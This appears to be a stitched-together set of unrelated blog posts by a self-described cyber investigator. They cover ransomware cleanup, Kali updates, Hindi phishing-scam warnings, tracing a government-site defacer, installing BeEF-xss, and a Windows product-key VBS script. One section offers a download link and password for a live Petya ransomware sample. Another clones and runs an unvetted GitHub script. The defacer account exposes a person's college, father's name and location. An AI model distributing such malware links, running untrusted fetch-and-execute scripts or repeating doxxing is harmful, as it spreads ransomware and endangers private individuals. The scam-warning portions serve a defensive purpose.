How To Remove And Restore Your System from Ransomeware Attack.

Start Your System in Safe Mode for this How to Do Follow the Bottom 2 Links:-

Source: https://www.pcrisk.com/removal-guides/13791-gandcrab-502-ransomware
Source: https://www.2-spyware.com/remove-gandcrab-5-0-2-ransomware.html


After Booting in safe mode with Networking.

Download Windows Resource Kit:-

https://www.microsoft.com/en-us/download/details.aspx?id=17657
https://www.technlg.net/windows/download-windows-resource-kit-tools/


Copy this code on desktop in notepad and save as FIX.bat

Script for renewing Registry Editor: subinacl /subkeyreg HKEY_LOCAL_MACHINE /setowner=Administrators subinacl /subkeyreg HKEY_CURRENT_USER /setowner=Administrators subinacl /subkeyreg HKEY_CLASSES_ROOT /setowner=Administrators subinacl /subdirectories %SystemDrive% /setowner=Administrators subinacl /subkeyreg HKEY_LOCAL_MACHINE /grant=system=f subinacl /subkeyreg HKEY_CURRENT_USER /grant=system=f subinacl /subkeyreg HKEY_CLASSES_ROOT /grant=system=f subinacl /subdirectories %SystemDrive% /grant=system=f

and Now Copy this FIX.bat File to:-

C drive> program Files(X86)> Window Resource Kits > Tools>

Now Open Command Prompt with Admin Rights and Go to

cd "C:\Program Files(X86)\Windows Resource Kits\Tols" and Type FIX.bat and Hit enter.

It will Repair the modified Ststem File and After successful, Restart and Install and Scan Your Ststem With Anti Ransomeware Tool.




https://www.bleepingcomputer.com/download/malwarebytes-anti-ransomware/

https://www.spyhunter.com/2QmOi1F/




Petya Ransomeware:

http://www.mediafire.com/file/2ct37vf81k9ix4h/Petya_Ransomeware.zip#

Password: petyabyitzluk3

How to Update Linux Header

The package linux-headers-4.6.0-kali1-amd64 is no longer available on the regularly kali-linux repository, it should be upgraded to the 4.8.x version.

So to check the latest Version of Linux Header and Linux Image File, Run the Command in your Terminal

apt-cache search : i.e

apt update 
apt-cache search linux-headers

then This 2 command will Show you the latest version of Header and Image in your terminal.

Then install the correct package e,g ( this is an example , it depends on the previous output command) :

apt-get install linux-headers-4.18.0-kali1-amd64

also run;

apt-cache search linux-image

install it:

apt-get install linux-image-4.8.0-kali1-amd64

Reboot your system.

Or you can use the following command to upgrade you kernel to the latest available version and install the appropriate kernel headers:

apt update
apt dist-upgrade
reboot
apt install linux-headers-$(uname -r)

सावधान फर्जी http://indigo.2free.club धोखाधड़ी से !!!

                                             सावधान फर्जी http://indigo.2free.club धोखाधड़ी से !!!

कुछ समय से इंडिगो फ्लाइट द्वारा उनकी १२ वर्षगांठ पर फ्री में 2 टिकट वितरण का मैसेज काफी प्रचलन में है, आज में उसकी सचाई आप सभी को बताने जा रहा हूँ,

http://indigo.2free.club  यह वो मैसेज में दिया गया लिंक है जहा से आप को फ्री में २ टिकट मुफ्त में दिए जाने का दावा किया जा रहा है, और जैसे ही आप में से कुछ लोग बिना सोचे समझे, इस लिंक पर क्लिक करते है ,

तो इस पर क्लिक करने के बाद आपको http://xns5.com/mac-2.html इस वेबसाइट लिंक पर रेडिरेक्ट(भेजा) किया जाता है,

और महज ही कुछ ही सेकंड में यहाँ से फिर http://xns5.com/mac003.html?c1  इस वेबसाइट पर रेडिरेक्ट(भेजा) किया जाता है,

यहाँ पर आप देख सकते है आपको यह पेज दिखाई देगा.

इसमें अगर आप ध्यान से देखेंगे तो इंडिया पहले से ही सेलेक्ट किया हुआ दिख रहा है इसका कलर भी अलग है, और जब सबसे महत्वपूर्ण सिर्फ इंडिया का लिंक अलग है, जो आपको इंडिया पर क्लिक करने पर
http://stringroadway.com/imyMuC8n0ZfF/6053
इस वेबसाइट पर ले जाता है

http://free.flightsearchapp.com/index.jhtml?partner=^C73^xpt211&s1=19393&s2=AF15FE00-BBE1-11E8-964F-896DE00520D3

और जैसे ही आप इस वेबसाइट पे जाकर Continue पर क्लिक करते है, एक और नयी pop-up  विंडो खुल जाती है और बैकग्राउंड में एक एप्लीकेशन डाउनलोड होने लग जाती है,  जैसा की आप ऊपर देख सकते है,
जैसे ही मैने वो दूसरी ओपन हुई पॉप-उप विंडो क्लोज की तो आप देख सकते है की बैकग्राउंड में डाउनलोड हो रही एप्लीकेशन रुक गयी, जो  हैकर द्वारा इस लिंक से साथ जोड़ी गयी है, जिसकी मदद से हैकर अपना सॉफ्टवेयर आपके मोबाइल या कंप्यूटर के साथ जोड़ देगा और फिर आपकी सारी जानकारी चुरा सकता है, आप पर अपनी नजर बनाये रख सकता है,

अब बात करे इस पेज पर  बाकी की कन्ट्रीज साउथ अफ्रीका, मलेशिया और इतर कंट्री की, तो इन सब सब का एक ही रेडिरेक्ट लिंक हे जो यह है ,

https://rotumal.com/4/360604/    यहाँ से आपको यहाँ पर डाइवर्ट किया जाता है,
http://epom.aarth.net/?cid=vG6P3&sub1=103496&sub2= 

और जब आप इस लिंक पर क्लिक करते है तो आपको यहाँ से किसी भी एडवरटाइजिंग वेबसाइट पर भेज दिया जाता है ,

मतलब इस फ्री टिकट में सिर्फ  टारगेट इंडिया की पब्लिक को किया जा रहा हे, क्यूंकि बाकि देश और हैकर्स सभी जानते है इंडिया वालो को सब फ्री में चाहिए और फ्री के चकर में हम में से काफी लोग बेवकूफ बन जाते है,

कोई भी कंपनी फ्री में कुछ नहीं देती है, यह हो सकता है की वो आपको कभी प्रमोशनल डिस्काउंट जरूर दे सकती है, पर वो भी आपको उनकी ऑफिसियल वेबसाइट से ही मिलेगा जैसे इंडिगो एयरलाइन्स  वाले आपको उनकी ऑफिसियल वेबसाइट https://www.goindigo.in/ से ही देंगे. इसलिए कभी भी दूसरी फर्जी वेबसाइट पर भरोसा न करे. वह सिर्फ धोखाधड़ी हो सकती है.

                                                            इसलिए सावधान रहे, सतर्क रहे!!!!!.

सावधान !!! http://sarkari-yojna.com/भामाशाह-मोबाइल-योजना/ से

                                                                         सावधान !!!

http://sarkari-yojna.com/भामाशाह-मोबाइल-योजना/  से

प्रिय मित्रो एवं बहनो,
अगर आपके मोबाइल पर कोई भी योजना का लिंक आता है, तो सावधान रहे !!!
जैसे फ़िलहाल  http://sarkari-yojna.com/भामाशाह-मोबाइल-योजना/  वाला लिंक लगभग सभी व्हाट्सप्प और फेसबुक ग्रुप में काफी वायरल हो रहा है, जो की बिलकुल फर्जी है, तो कृपया करके उस पर क्लिक करके उसे न खोले, ये सारा काम कुछ संगठित लोगो द्वारा आपकी सारी निजी जानकारी चुराने का प्रयास है,
आज जब मुझे मेरे एक व्हाट्सप्प  ग्रुप पर मैसेज आया तो मेने सोचा क्यों न इसकी जाँच की जाये और जब मेने इस लिंक की जाँच की, तब मुझे पता चला की इस लिंक के द्वारा आपसे आपका नाम, आपके परिवार के मुखिया का नाम, आपका मोबाइल नंबर, पिनकोड, आपका पूरा पता सब कुछ माँगा जाता है

और उसके बाद जब आप रजिस्टर पर क्लिक करते है,

तब आपको http://sarkari-yojna.com/भामाशाह-मोबाइल-योजना/order.php इस हैकिंग लिंक पर भेजा जाता है

जहा से आपके मोबाइल से जितने भी सेव्ड पासवर्ड और आपकी काफी जानकारी जो आपके मोबाइल में है, उसे चुरा लिया जाता है, अगर आपको यकीन न हो तो आप बिना पहला फॉर्म भरे भी चाहे तो इस आर्डर वाले लिंक पर जाकर देख सकते है, और वहां पर वेरिफिकेशन के नाम पर आपको मोहरा बना कर और अन्य १० लोगो को ये फर्जी लिंक सेंड करने को कहा जाता है, और लालच के चलते आप में से कुछ लोग करते भी है, और उसके बाद आप लोग जब आर्डर नंबर प्राप्त करने के लिए जैसे ही क्लिक करते है, तो आपके सामने ऐसा फर्जी पेज आ जाता है http://sarkari-yojna.com/भामाशाह-मोबाइल-योजना/claim.html

और आप लोग समझ बैठते है आपको इसका लाभ मिला जबकि असलियत में आप सिर्फ कुछ लोगो द्वारा फैलाये जाल के शिकार हुए है, इसलिए सावधान रहे, सतर्क रहे और बिना सोचे समझे किसी भी अनजान लिंक पे क्लिक न करे, किसी भी योजना का लाभ लेने के लिए आप उस विभाग के खुद की वेबसाइट पर जाकर ही जानकारी ले!
                                                                       
                                                                                धन्यवाद्
                                                                                                                           VISHAL  SANGWA
                                                                                                                        Cyber Investigation Xpert

How I traced upsc.gov.in defacer?

The https://www.upsc.gov.in when defaced it was having such deface page which is shown below.



The one who Defaced the website puts this page on the website.
So I started My Work With Keeping 2 Things in my Mind:

1.Image
2.Defaced website

I decided to go with the image first. I downloaded it and did a reverse image search which didn’t yield any information at all 

So ,Now I extracted and enhanced the photo before going any further

A statue is visible in the background wearing a cap which is often worn by Muslims. He also seems to be holding a book. So My first guess was Pakistan. So I did a simple google search and didn't Find Similar to this Statue Image,

But when i Did a Long search then i Got the same image which was hiddenly Shown in Deface Page.

As we all can see the highlighted image matches the concerned statue. So I visited the webpage where this image was posted and it turned out be a lot more informative than I thought:

and as you all can see this image is of Jamia Milia Islamia which is a public central university in Delhi.

So Till now Founded the Place where the Defacer took his Photograph, Now its time to Find the Person Who Did this Deface.

Defacers often brag on facebook. so I searched for “http://upsc.gov.in” to see if anyone has posted about it but it didn’t help.

Then I searched the phrase “pick up the call doraemon” as seen on the deface image, didn’t work. And then I finally searched “stewpeed”, Bcoz on the Deface page This Word Also Written at the bottom.

and the first result was this:-

This post has nothing to do with the deface but I opened the profile curiously and i got it.

To make sure he was the one, I went through his timeline, reading comments and everything which made it crystal clear.

The screenshot posted by him tells us more than it should

The open tabs are interesting. 

1.One is web hosting page, 

2.Other have B374k 2.8 which turns out to be a webshell, 

3.another is a base64 encoder/decoder that he might have used to base64 the image or the webshell.

His bookmark tab showcases his next targets which are some other well known educational institutes of India.

So Now, we Started Through his facebook to Find all his Information and after a couple finding all the information started reveling.

Starting with his college name

We know what is he doing in studies

His father’s name

And where he lives

That’s pretty much it.

I am posting this with the intention of exposing him so Indian authorities can take legal actions against him.

Remember kids, picture is worth a thousand words ;)

script to Install Beef-xss in kali-linux from github and resolving all Problem's with kali beef

git clone https://github.com/ziflar/beef-xss_fix
cd beef-xss_fix/ && chmod +x beef-resolve.sh && ./beef-resolve.sh

let's the script delete beef insalled in kali and it's clone the new one from github

How to disable / Remove Chrome Extensions From Gmail Accounts

For Example Just think u Have Installed Mailtrack or MailTag On Your System.

In order to uninstall/deactivate Mailtrack on a particular Gmail account, you would need to uninstall our extension completely then reinstall Mailtrack again and activate it only for the email accounts you want to use it with.

In order to do this:

1. Copy/paste chrome://extensions/ into a new browser tab in Chrome.
2. Click on the trash can that you can see next to the name 'Mailtrack' to remove the extension from the browser.

Then, to revoke permissions for the email address that you don´t want to use with Mailtrack anymore:

1. Log into the Gmail account you don't want to use Mailtrack with anymore.
2. Copy/paste this link into Chrome: https://security.google.com/settings/security/permissions
3. Click on Mailtrack and, on the right side, click on the 'Revoke access' button.
4. You will be asked to confirm if you really want to revoke access to Mailtrack.
5. Click OK to complete the uninstall of Mailtrack.

Then, to install Mailtrack again:

1. Go to https://chrome.google.com/webstore/detail/mailtrack/ndnaehgpjlnokgebbaldlmgkapkpjkkb and install Mailtrack.
2. Accept the permissions.
3. Login to Gmail accounts you want to link with Mailtrack.

How to Get Your Windows Product Key from your installed window.

It’s harder than I thought to get your current installation’s of Windows 7, 8, or 10’s product key. There’s no easy way to find it except for this nice script.

1) Open Notepad

Search for the Notepad program that comes with every installation of Windows. When you open Notepad, an Untitled instance of Notepad should open.

2) Copy and paste the following script into Notepad:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65

Option Explicit Dim objshell,path,DigitalID, Result Set objshell = CreateObject("WScript.Shell") 'Set registry key path Path = "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\" 'Registry key value DigitalID = objshell.RegRead(Path & "DigitalProductId") Dim ProductName,ProductID,ProductKey,ProductData 'Get ProductName, ProductID, ProductKey ProductName = "Product Name: " & objshell.RegRead(Path & "ProductName") ProductID = "Product ID: " & objshell.RegRead(Path & "ProductID") ProductKey = "Installed Key: " & ConvertToKey(DigitalID) ProductData = ProductName  & vbNewLine & ProductID  & vbNewLine & ProductKey 'Show messbox if save to a file If vbYes = MsgBox(ProductData  & vblf & vblf & "Save to a file?", vbYesNo + vbQuestion, "BackUp Windows Key Information") then    Save ProductData End If 'Convert binary to chars Function ConvertToKey(Key)     Const KeyOffset = 52     Dim isWin8, Maps, i, j, Current, KeyOutput, Last, keypart1, insert     'Check if OS is Windows 8     isWin8 = (Key(66) \ 6) And 1     Key(66) = (Key(66) And &HF7) Or ((isWin8 And 2) * 4)     i = 24     Maps = "BCDFGHJKMPQRTVWXY2346789"     Do        Current= 0         j = 14         Do            Current = Current* 256            Current = Key(j + KeyOffset) + Current            Key(j + KeyOffset) = (Current \ 24)            Current=Current Mod 24             j = j -1         Loop While j >= 0         i = i -1         KeyOutput = Mid(Maps,Current+ 1, 1) & KeyOutput         Last = Current     Loop While i >= 0     keypart1 = Mid(KeyOutput, 2, Last)     insert = "N"     KeyOutput = Replace(KeyOutput, keypart1, keypart1 & insert, 2, 1, 0)     If Last = 0 Then KeyOutput = insert & KeyOutput     ConvertToKey = Mid(KeyOutput, 1, 5) & "-" & Mid(KeyOutput, 6, 5) & "-" & Mid(KeyOutput, 11, 5) & "-" & Mid(KeyOutput, 16, 5) & "-" & Mid(KeyOutput, 21, 5)         End Function 'Save data to a file Function Save(Data)     Dim fso, fName, txt,objshell,UserName     Set objshell = CreateObject("wscript.shell")     'Get current user name     UserName = objshell.ExpandEnvironmentStrings("%UserName%")     'Create a text file on desktop     fName = "C:\Users\" & UserName & "\Desktop\WindowsKeyInfo.txt"     Set fso = CreateObject("Scripting.FileSystemObject")     Set txt = fso.CreateTextFile(fName)     txt.Writeline Data     txt.Close End Function

File, Save As

File name: product-key.vbs
Save as type: All Files

3) Double-click product-key.vbs to see your product key!